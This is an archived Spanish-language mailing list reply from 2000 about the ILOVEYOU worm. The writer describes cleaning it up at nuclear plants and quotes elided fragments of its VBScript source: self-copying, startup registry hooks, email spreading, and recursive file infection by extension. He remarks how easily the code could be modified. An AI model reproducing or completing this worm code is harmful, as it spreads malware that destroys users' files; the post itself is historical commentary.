[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [escepticos] El peor virus de la historia....¿magufa?

To: escepticos en ccdis.dis.ulpgc.es
Subject: Re: [escepticos] El peor virus de la historia....¿magufa?
From: Omar Alos Font <oalos@...>
Date: Sun, 07 May 2000 09:05:16 +0200
References: <39145368.DC7DE987 en terrabit.ictnet.es> <a04310100b53a2dd7149d en [212.106.209.166]>
Reply-to: escepticos en ccdis.dis.ulpgc.es
Sender: owner-escepticos en dis.ulpgc.es

El virus es real
los efectos son reales
En las centrales nucleares de ascó y vandellós se han borrado planos
(hay copias de seguridad, desde luego)
el viernes, salí a las 22:00 en vez de las 14:00, arreglando y
desinfectando los dos virus:
el ILOVYU + los usuarios intentando arreglar ellos mismos su ordenador
(los usuarios a veces son el peor virus posible)
el lunes me toca entrar a las 6:00. El correo lleva desde el jueves por
las noche desconectado del exterior, este fin de semana iban a
desconectar el el correo interno.
La central parecía una comuna hipi, todo el mundo quería a todo el mundo
( a mí que querían sólo 31 personas, pero la mayoría de la gente tenía
más de cien pretendientes)
Pero para mi, lo peor no es este virus, sino los mutantes que llegarán
(la version de mcafee del viernes a mediodía ya detectaba 8 variantes).
Y es que el cabrón de autor ha hecho un código claro y elegante que
puede ser modificado por cualquiera con unos mínimos conocimientos de
programación. os pongo abajo unos trozos del código, fijaros en las
ultimas 4 lineas, cualquiera que tenga alguna noción de lo que es un
programa puede modificar estos if.. then y poner lo que le de la gana
(doc, pdf, dll,...).
Y es que a este código sólo le falta ponerle comentarios

Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
...

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub

...
sub folderlist(folderspec)  
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)  
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next  
end sub
..
if (ext="vbs") or (ext="vbe") then
..
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or
(ext="sct") or (ext="hta") then
..
elseif(ext="jpg") or (ext="jpeg") then
..
elseif(ext="mp3") or (ext="mp2") then


Saludos , Omar

P.D.: lo que me hace gracia es cuando dicen que , según algunas fuentes,
el autor podría ser filipino.
ved las dos primeras líneas del virus:

rem  barok -loveletter(vbe) <i hate go to school>
rem                     by: spyder  /  ispyder en mail.com  /   en GRAMMERSoft
Group  /
Manila,Philippines

Follow-Ups:
- Re: [escepticos] El peor virus de la historia....¿magufa?
  - From: Josep Català Medina <tecpress@...>
- Re: [escepticos] El peor virus de la historia....¿magufa?
  - From: "José M. Bello Diéguez" <jmbello@...>

References:
- [escepticos] El peor virus de la historia....¿magufa?
  - From: Josep Català Medina <tecpress@...>
- Re: [escepticos] El peor virus de la historia....¿magufa?
  - From: breixo <breixo@...>

Prev by Date: [escepticos] RE: [escepticos] El peor virus de la historia....¿magufa?
Next by Date: RE: [escepticos] RE: Hola!
Previous by thread: Re: [escepticos] El peor virus de la historia....¿magufa?
Next by thread: Re: [escepticos] El peor virus de la historia....¿magufa?
Index(es):
- Date
- Thread